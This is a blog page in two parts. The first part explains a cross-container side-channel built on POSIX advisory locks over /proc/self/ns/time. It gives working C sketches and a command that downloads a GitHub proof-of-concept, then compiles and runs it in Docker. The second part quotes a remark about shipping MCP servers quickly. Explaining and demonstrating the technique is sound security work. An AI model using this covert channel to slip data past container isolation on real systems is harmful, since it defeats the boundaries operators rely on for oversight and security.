Simon Willison’s Weblog

Wednesday, 12th November 2025

Fun-reliable side-channels for cross-container communication (via) Here's a very clever hack for communicating between processes running in different containers on the same machine. It's based on abuse of POSIX advisory locks, which allow a process to create and detect locks across byte offset ranges of a file:

These properties combined are enough to provide a basic cross-container side-channel primitive, because a process in one container can set a read-lock at some interval on /proc/self/ns/time, and a process in another container can observe the presence of that lock by querying for a hypothetically intersecting write-lock.
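To make that primitive concrete, here's a minimal C sketch based purely on the description above (my own illustration, not code from the h4x0rchat PoC). Run it with the argument "set" in one process to hold a read lock on a single byte offset; run it with no argument in another process to probe for that lock:

/* Sketch of the lock side-channel primitive. One process holds a
 * read lock on a byte range of /proc/self/ns/time; another uses
 * F_GETLK to ask whether a hypothetical write lock would conflict. */
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char **argv) {
    /* Docker doesn't unshare the time namespace by default, so this
     * path resolves to the same inode in every container. */
    int fd = open("/proc/self/ns/time", O_RDONLY);
    if (fd < 0) { perror("open"); return 1; }

    struct flock fl;
    memset(&fl, 0, sizeof fl);
    fl.l_whence = SEEK_SET;
    fl.l_start = 42;            /* arbitrary agreed-upon byte offset */
    fl.l_len = 1;

    if (argc > 1 && strcmp(argv[1], "set") == 0) {
        fl.l_type = F_RDLCK;    /* sender: take and hold the read lock */
        if (fcntl(fd, F_SETLK, &fl) < 0) { perror("F_SETLK"); return 1; }
        puts("read lock held on offset 42; sleeping");
        sleep(60);              /* the lock drops when the process exits */
    } else {
        fl.l_type = F_WRLCK;    /* receiver: probe, don't actually lock */
        if (fcntl(fd, F_GETLK, &fl) < 0) { perror("F_GETLK"); return 1; }
        puts(fl.l_type == F_UNLCK ? "bit = 0 (no lock)"
                                  : "bit = 1 (lock present)");
    }
    return 0;
}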

I dumped the C proof-of-concept into GPT-5 for a code-level explanation, then had it help me figure out how to run it in Docker. Here's the recipe that worked for me:

cd /tmp
wget https://raw.githubusercontent.com/crashappsec/h4x0rchat/9b9d0bd5b2287501335acca35d070985e4f51079/h4x0rchat.c
docker run --rm -it -v "$PWD:/src" \
  -w /src gcc:13 bash -lc 'gcc -Wall -O2 \
  -o h4x0rchat h4x0rchat.c && ./h4x0rchat'

Run that docker run line in two separate terminal windows and you can chat between the two of them like this:

[Animated demo: two terminal windows each run that command and start a l33t-speak chat interface. Each asks the user for a name; messages typed in one appear instantly in the other and vice-versa.]
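The probe above yields one bit per byte offset. I haven't traced exactly how h4x0rchat frames its messages, so here's a hypothetical sketch of turning that one-bit probe into a byte channel by treating eight adjacent offsets as bit positions. The window offset, helper names, and framing are all mine, not the PoC's protocol:

/* Hypothetical framing on top of the primitive: hold read locks on
 * the offsets whose bits are 1 within an agreed 8-byte window. */
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BASE_OFFSET 100  /* agreed-upon start of the 8-bit window */

/* Sender: lock offset BASE_OFFSET+i for every set bit i of c. */
static void send_byte(int fd, unsigned char c) {
    for (int i = 0; i < 8; i++) {
        struct flock fl = { .l_whence = SEEK_SET,
                            .l_start = BASE_OFFSET + i, .l_len = 1 };
        fl.l_type = ((c >> i) & 1) ? F_RDLCK : F_UNLCK;
        fcntl(fd, F_SETLK, &fl);   /* set or clear one bit */
    }
}

/* Receiver: probe each offset with a hypothetical write lock. */
static unsigned char recv_byte(int fd) {
    unsigned char c = 0;
    for (int i = 0; i < 8; i++) {
        struct flock fl = { .l_whence = SEEK_SET,
                            .l_start = BASE_OFFSET + i, .l_len = 1,
                            .l_type = F_WRLCK };
        fcntl(fd, F_GETLK, &fl);
        if (fl.l_type != F_UNLCK)  /* another process holds this bit */
            c |= (unsigned char)(1u << i);
    }
    return c;
}

int main(int argc, char **argv) {
    int fd = open("/proc/self/ns/time", O_RDONLY);
    if (fd < 0) { perror("open"); return 1; }
    if (argc > 2 && strcmp(argv[1], "send") == 0) {
        send_byte(fd, (unsigned char)argv[2][0]);
        printf("holding locks for '%c'\n", argv[2][0]);
        sleep(60);               /* locks vanish when this process exits */
    } else {
        printf("read byte: '%c'\n", recv_byte(fd));
    }
    return 0;
}

A real chat would also need some handshake offset so the reader doesn't sample a byte mid-update; presumably the PoC layers something like that on top.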

# 4:04 pm / c, docker

The fact that MCP is a different surface from your normal API allows you to ship MUCH faster to MCP. This has been unlocked by inference at runtime.

Normal APIs are promises to developers, because developers commit code that relies on those APIs, and then walk away. If you break the API, you break the promise, and you break that code. This means a developer gets woken up at 2am to fix the code.

But MCP servers are called by LLMs which dynamically read the spec every time, which allows us to constantly change the MCP server. It doesn't matter! We haven't made any promises. The LLM can figure it out afresh every time.

Steve Krouse

# 5:21 pm / apis, ai, generative-ai, llms, steve-krouse, model-context-protocol
